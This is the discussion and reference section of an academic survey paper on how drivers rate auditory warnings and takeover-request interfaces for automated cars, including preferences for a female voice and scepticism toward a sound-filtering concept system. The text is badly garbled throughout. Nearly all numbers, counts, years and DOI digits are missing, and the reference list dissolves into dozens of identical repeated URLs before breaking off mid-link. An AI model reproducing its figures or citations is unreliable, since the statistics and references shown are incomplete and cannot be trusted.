analysis. in total, , comments were analysed. a collection of mixed responses was received. overall, more comments were classified as positive (n = ) than negative (n = ) to the fs. however, the respondents also pointed out concerns about a number of characteristics that they as- sociated with the system: annoyance to both the driver and to other road users in the traffic (n = ), distraction (n = ), and loudness (n = ). fifty-five respondents expressed their concerns that the system would be impractical; however, most of such concerns could be associated with the lack of understanding of the concept of a fully automated car. certain respondents showed a high level of negativity caused by an apparent lack of un- derstanding the concept of filtering only specific sounds coming from the outside environ- ment. examples are: “you can not hear some bells or signal from other cars”, “main disad- vantage: makes driver unaware of any dangers”, “if car noises are filtered out how would you hear if another car is incoming”, and “i feel that filtering other car noise may be dangerous”. in q the respondents were asked to indicate their preference for types of interfaces to be used for takeover requests in had. one of the options in that question was “other”. if respondents selected this option, they were invited to provide further comments in q . the responses that were less than five characters long (n = ) or that were not written in english (n = ) were ignored. in total, responses were analysed. one respondent indi- cated that he/she would prefer to be aided by continuous beeps until he/she reclaimed con- trol. another respondent stated “steering wheel up or down motion to signal steering wheel usage needed, accompanied by a specific message”. one respondent mentioned that inter- bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. faces used in such scenario need to be adaptive depending on the urgency of the request “it honestly depends on the situation the car needs me to take over for. does it affect anyone’s safety at all? does it actually /need/ to be done straight away? is it critically important in any other way? in those cases i’d obviously like a very noticeable signal however ‘annoying’ it may be. in other situations however i’d prefer a decent text message or a gentle reminder”. discussion the aim of this study was to obtain opinions on preferred feedback types for takeover requests in had from a large number of people coming from all over the globe. additionally, the aim was to measure perceived helpfulness and annoyance of auditory interfaces for three systems. specifically, the respondents who participated in the survey were presented with two existing systems used in modern vehicles (a parking assistant [pa] & a forward collision warning system [fcws]) and one futuristic setup (fs) envisioned for fad. respondents were asked whether they would consider using the proposed fs in future automated vehicles. our survey helped us to gather opinions from people before technology is actually available. previous research suggests that the modality of aiding systems in automated cars should be chosen carefully to avoid frustration of people who will be using such vehicles and to increase safety of automation on public roads. stanton, young & mccaulder ( ) expressed concerns that interfaces currently employed in acc do not support the understanding of the behaviour and limitations of the system. a driving simulator study by adell et al. ( ) provided a comprehensive analysis of combinations of interfaces for supporting safe driving. participants in that study were most positive about the haptic interface, while the auditory warning signals were not highly appreciated, which may be explained by the nature of the experiment that exposed the participants to a high urgency scenario of avoiding rear-end collisions (adell et al., ). findings from the aviation field show that the female voice is more difficult to understand in noisy environments (nixon et al., a). it has also been argued that the female voice has the advantage that it stands out more in a predominantly male environment, such as the military (noyes, hellier & edworthy, ). differences in speech intelligibility and perceived urgency between male and female voices are generally small and findings have been mixed (e.g., arrabito, ; edworthy, hellier & rivers, ; nixon et al., b). however, it has been found that most people normally use a female voice when using their route navigation device (large & burnett, ). in the present research, respondents were asked to select the types of interfaces they are willing to be guided by during a takeover request. the results of our survey further showed that the female voice is preferred in both english and non-english speaking countries. thus, our findings reinforce the idea that the overall most preferred way to support the transition of control is an auditory instruction performed with a female voice. note that determining the language of respondents based on their ip address cannot guarantee accurate results in all cases. in future surveys adding a question prompting for the participant’s spoken language may yield more accurate results. bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. it was found that the participants showed a relatively low level of appreciation of vibratory interfaces, which contrasts with the findings in adell et al. ( ). this could be due to the fact that only a small number of systems that feature vibratory feedback are available in modern vehicles. a relatively large number of people indicated that they would like to be aided by all four proposed modalities. in addition, a large number of respondents indicated that the combination of a sound signal, a visual message, and a vibration signal would be preferable during takeover requests in highly automated driving. this is a surprising finding as such a combination is not common in current cars. a possible explanation of this finding could be that the respondents misinterpreted the question and instead of indicating their preference for multimodal feedback, expressed their preferences for the types of feedback that can be used separately from each other during takeover requests in highly automated driving. another limitation of the present study is that we did not vary possible parameters of the feedback signals, including the quality, intensity, timing, and speed of delivery of the takeover requests. future experimental research could investigate the effects of such parameters. the existing systems—the pa and fcws—received favourable ratings, which may not be surprising, since these systems have already been tested and are already available on the market. one limitation in this context is that the participants relied on a narrative description, complemented with a visual illustration; the survey did not contain actual examples of auditory cues. before the initiation of the survey, it was believed that the proposed fs would be seen as a way to enhance the enjoyment of driving a car through a scenic place. the results showed that the participants were rather sceptical about such a concept: the system was perceived as somewhat annoying, with a mean score of . to question q on the scale from disagree strongly ( ) to agree strongly ( ). the proposed fs was not highly rated, possibly because the concept was perceived as a bad idea, because of a lack of previous experience with such system, or because people could not envision it due to the lack of a realistic representation (see also the analysis of the textual comments). it should also be noted that a large proportion of respondents selected the middle option neither agree nor disagree, possibly indicating difficulties with understanding the concept of the proposed system (for studies into middle category endorsement, see kulas, stachowski & haynes, ; kulas & stachowski, ; sturgis, roberts & smith, ). small effects of age on the acceptance of fad were previously reported by payre, cestac & delhomme ( ). in the present study, we also observed small age effects regarding the self-reported annoyance of the three proposed systems: younger participants saw the pa and fcws as more annoying than older respondents did. however, young respondents perceived the fs as less annoying than the older respondents. it is known that younger peo- ple are more likely to accept new technologies (lee, ; tacken et al., ), and thus may be more successful at envisioning such abstract concepts as the fs. a somewhat stronger age effect was observed regarding helpfulness: older respondents found the fcws more helpful than the younger participants. it is known that young people feel more confident behind the wheel (matthews & moran, ; lee et al., ; lee, ; clarke, ward & truman, ), and therefore may think they need less external help than older drivers. bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. crowdflower offers a platform that supports full anonymity of participants. this anonymity may have encouraged respondents to express their thoughts freely, without the fear of being judged by the organizers of the survey. all but the last free-response items required people to enter at least one character. a large number of respondents did not provide meaningful comments. however, a substantial portion of respondents did provide valuable answers, facilitating the understanding of what people think about not only the use of auditory interfaces in future highly and fully automated cars, but also about the concept of automated driving in general. numerous respondents expressed their concerns about the qualities of current pa and fcws systems. some participants suggested that they want to be aided by visual and vibratory feedback in addition to auditory feedback. a number of people indicated the inaccessibility of modern pas and fcwss to deaf users. however, current systems also provide haptic and/or visual cues (bmw, ; volvo, b; ford, ; honda, ), and so people with a hearing impairment could still benefit from such multimodal feedback. some respondents were sceptical about the introduction of highly and fully automated vehicles, which may be related to general consumer scepticism about new technologies. respondents expected that most cars would drive fully automatically by the year (median value), a result that matches findings in previously published research (sommer, ; de winter et al., ; kyriakidis, happee & de winter, ). the total cost of the study performed by means of a crowdsourced online-based survey was lower than what is offered by companies that conduct similar surveys with help of classic recruitment methods (de winter et al., ). a group of people filled in the survey more than once, and we reasoned that their responses ought not to be trusted. thus, we applied a strict filter, and removed all respondents who filled out the survey more than once. we also excluded all people who had one or more missing items. with appropriate data quality control mechanisms, crowdsourcing is known to be a powerful research tool (howe, ; kittur, chi & suh, ; mason & suri, ; crump, mcdonnell & gureckis, ). nonetheless, as with any self-report questionnaire, the validity of the results is limited to what people can imagine or retrieve from their memory. furthermore, crowdflower respondents are not representative of the entire population of stakeholders of future had cars. it is likely that highly automated vehicles will initially be purchased by wealthy people, while projects on crowdflower are often completed by people from low-income countries (kyriakidis, happee & de winter, ). in conclusion, the present survey study showed that the pa and fcws were well appreciated by respondents, whereas the proposed future system (fs) was not rated highly. a second conclusion is that the female voice is the most preferred takeover request among the offered options. the scientific community and the automotive industry may be able to use the information gathered in the present survey for the development of automated driving systems, in particular future iterations of parking assistants and forward collision warning systems, as well as for the design of human-machine interfaces for automated driving. bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. acknowledgements we would like to express our special gratitude to daria nikulina for designing the illustrations used in the survey. additional information and declarations funding the research presented in this paper is being conducted in the project hfauto–human factors of automated driving (pitn-ga- - ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: hfauto–human factors of automated driving: pitn-ga- - . competing interests the authors declare there are no competing interests. author contributions • pavlo bazilinskyy conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper, organised outsourcing of creation of illustrations. • joost de winter conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. human ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the research was approved by the human research ethics committee (hrec) of the delft university of technology. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references adell e, varhelyi a, fontana md, bruel l. . test of hmi alternatives for driver support to keep safe speed and safe distance—a simulator study. the open transportation journal : – doi . / . bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. alicandri e, moyer mj. . human factors and the automated highway system. proceedings of the human factors and ergonomics society annual meeting : – doi . / . arrabito gr. . effects of talker sex and voice style of verbal cockpit warnings on performance. human factors : – doi . / . bainbridge l. . ironies of automation. automatica : – doi . / - ( ) - . banks va, stanton na, harvey c. . sub-systems on the road to vehicle automation: hands and feet free but not ‘mind’ free driving. safety science : – doi . /j.ssci. . . . barón a, green p. . safety and usability of speech interfaces for in-vehicle tasks while driving: a brief literature review. technical report no. umtri- - . ann arbor: transportation research institute, university of michigan. available at http://www.umich.edu/∼driving/ publications/umtri- - a.pdf (accessed july ). begault dr. . head-up auditory displays for traffic collision avoidance system advisories: a preliminary investigation. human factors : – doi . / . beiker sa. . legal aspects of autonomous driving: the need for a legal infrastructure that permits autonomous driving in public to maximize safety and consumer benefit. santa clara law review : – . belz sm, robinson gs, casali jg. . a new class of auditory warning signals for complex systems: auditory icons. human factors : – doi . / . bergenhem c, pettersson h, coelingh e, englund c, shladover s, tsugawa s. . overview of platooning systems. in: proceedings of the th its world congress, vienna, austria. available at http://publications.lib.chalmers.se/records/fulltext/ /local .pdf (accessed july ). bmw. . bmw connecteddrive from a to z. available at http://www.bmw.com/com/en/ insights/technology/connecteddrive/ /a to z/index.html (accessed november ). bmw. . bmw x : park assistant. available at http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver assistance/park assistant.html#t=l (accessed november ). bosker b. . why siri’s voice is now a man (and a woman). available at http://www. huffingtonpost.com/ / / /siri-voice-man-woman n .html (accessed december ). braitman ka, mccartt at, zuby ds, singer j. . volvo and infiniti drivers’ experiences with select crash avoidance technologies. traffic injury prevention : – doi . / . brandenburg s, skottke e. . switching from manual to automated driving and reverse: are drivers behaving more risky after highly automated driving? in: proceedings of the ieee th international conference on intelligent transportation systems (itsc), qingdao, china. – . bregman as. . auditory scene analysis: the perceptual organization of sound. cambridge, ma: mit press. bronkhorst aw, veltman ja, van breda l. . application of a three-dimensional auditory display in a flight task. human factors : – doi . / . clarke dd, ward p, truman w. . voluntary risk taking and skill deficits in young driver accidents in the uk. accident analysis & prevention : – doi . /j.aap. . . . bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /j.ssci. . . http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://www.umich.edu/~driving/publications/umtri- - a.pdf http://dx.doi.org/ . / http://dx.doi.org/ . / http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / 